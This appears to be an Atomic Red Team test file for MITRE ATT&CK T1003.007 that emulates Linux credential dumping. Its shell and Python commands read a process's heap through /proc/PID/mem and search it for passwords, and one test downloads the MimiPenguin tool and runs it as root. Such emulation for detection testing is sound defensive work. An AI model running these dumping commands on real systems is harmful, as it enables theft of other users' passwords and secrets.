attack_technique: T1003.007 display_name: 'OS Credential Dumping: Proc Filesystem' atomic_tests: - name: Dump individual process memory with sh (Local) auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 description: | Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. supported_platforms: - linux input_arguments: output_file: description: Path where captured results will be placed type: path default: /tmp/T1003.007.bin script_path: description: Path to script generating the target process type: path default: /tmp/T1003.007.sh pid_term: description: Unique string to use to identify target process type: string default: T1003.007 dependencies: - description: | Script to launch target process must exist prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} get_prereq_command: | echo '#!/bin/sh' > #{script_path} echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} executor: name: sh elevation_required: true command: | sh #{script_path} PID=$(pgrep -n -f "#{pid_term}") HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1) MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1)))) MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2)))) MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START))) dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE" grep -i "PASS" "#{output_file}" cleanup_command: | rm -f "#{output_file}" - name: Dump individual process memory with sh on FreeBSD (Local) auto_generated_guid: fa37b633-e097-4415-b2b8-c5bf4c86e423 description: | Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted. supported_platforms: - linux input_arguments: output_file: description: Path where captured results will be placed type: path default: /tmp/T1003.007.bin script_path: description: Path to script generating the target process type: path default: /tmp/T1003.007.sh pid_term: description: Unique string to use to identify target process type: string default: T1003.007 dependencies: - description: | Script to launch target process must exist prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} get_prereq_command: | echo '#!/bin/sh' > #{script_path} echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} executor: name: sh elevation_required: true command: | sh #{script_path} PID=$(pgrep -n -f "#{pid_term}") MEM_START=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f1) MEM_STOP=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f2) MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START))) dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE" strings "#{output_file}" | grep -i PASS cleanup_command: | rm -f "#{output_file}" - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to copy a process's heap memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted. supported_platforms: - linux input_arguments: output_file: description: Path where captured results will be placed type: path default: /tmp/T1003.007.bin script_path: description: Path to script generating the target process type: path default: /tmp/T1003.007.sh python_script: description: Path to script generating the target process type: path default: PathToAtomicsFolder/T1003.007/src/dump_heap.py pid_term: description: Unique string to use to identify target process type: string default: T1003.007 dependencies: - description: | Script to launch target process must exist prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} get_prereq_command: | echo '#!/bin/sh' > #{script_path} echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - description: | Requires Python prereq_command: | (which python || which python3 || which python2) get_prereq_command: | echo "Python 2.7+ or 3.4+ must be installed" executor: name: sh elevation_required: true command: | sh #{script_path} PID=$(pgrep -n -f "#{pid_term}") PYTHON=$(which python || which python3 || which python2) $PYTHON #{python_script} $PID #{output_file} grep -i "PASS" "#{output_file}" cleanup_command: | rm -f "#{output_file}" - name: Capture Passwords with MimiPenguin auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c description: | MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions. supported_platforms: - linux input_arguments: output_file: description: Path where captured results will be placed type: path default: /tmp/T1003.007Test3.txt MimiPenguin_Location: description: Path of MimiPenguin script type: path default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh dependency_executor_name: sh dependencies: - description: | MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location}) prereq_command: | if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi; get_prereq_command: | wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz mkdir /tmp/mimipenguin tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin - description: | Strings must be installed prereq_command: | if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi; get_prereq_command: | sudo apt-get -y install binutils - description: | Python2 must be installed prereq_command: | if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi; get_prereq_command: | sudo apt-get -y install python2 - description: | Libc-bin must be installed prereq_command: | if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi; get_prereq_command: | sudo apt-get -y install libc-bin executor: command: | sudo #{MimiPenguin_Location} > #{output_file} cat #{output_file} cleanup_command: | rm -f #{output_file} > /dev/null name: bash elevation_required: true